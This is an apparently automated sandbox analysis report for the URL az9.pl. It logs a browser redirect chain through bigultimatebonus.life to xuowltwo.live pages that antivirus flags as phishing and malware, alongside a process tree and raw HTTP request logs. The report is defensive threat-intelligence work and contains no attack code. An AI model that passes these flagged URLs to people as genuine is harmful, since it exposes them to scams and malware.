Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://az9.pl/

Overview

General Information

Sample URL:http://az9.pl/
Analysis ID:1396696
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Creates files inside the system directory

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 732 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6128 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6388 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://az9.pl/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/iphone14pro.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_closed.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr3.jpgAvira URL Cloud: Label: malware
Source: https://bigultimatebonus.life/favicon.icoAvira URL Cloud: Label: phishing
Source: https://y1uy13f.xuowltwo.live/media/mainstream/icon.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/2.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/like.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/top_red.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr6.jpgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/sound.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr2.jpgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr11.jpgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_open.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_2.cssAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box-iphone14pro.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/l.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.cssAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_1.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr1.jpgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_3.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr5.jpgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr4.jpgAvira URL Cloud: Label: malware
Source: https://xuowltwo.live/crhhigmk/Avira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/flags/1x1/us.svgAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/u.jsAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102.cssAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/x1.pngAvira URL Cloud: Label: malware
Source: https://y1uy13f.xuowltwo.live/media/mainstream/alert.mp3Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: y1uy13f.xuowltwo.liveVirustotal: Detection: 6%Perma Link
Source: bigultimatebonus.lifeVirustotal: Detection: 14%Perma Link
Source: https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkruHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.46.128
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.46.128
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.46.128
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.46.128
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: az9.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru HTTP/1.1Host: bigultimatebonus.lifeConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bigultimatebonus.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkruAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=t1~h22irzseq2ep0nacjbfxeqrw; p1=https://xuowltwo.live/crhhigmk/; s1=ju6whgjvkqwdsgpi
Source: global trafficHTTP traffic detected: GET /crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bigultimatebonus.life/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/1102_2.css HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap@4.3.1/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/1102.css HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/flag-icon/css/flag-icon.css HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/1102_3.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/icon.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/sound.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/u.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/2.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/1102_1.js HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/l.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/iphone14pro.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/like.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr2.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr1.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr3.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/top_red.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ExtService.svc/getextparams HTTP/1.1Host: jsontdsexit2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://y1uy13f.xuowltwo.liveSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y1uy13f.xuowltwo.live/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
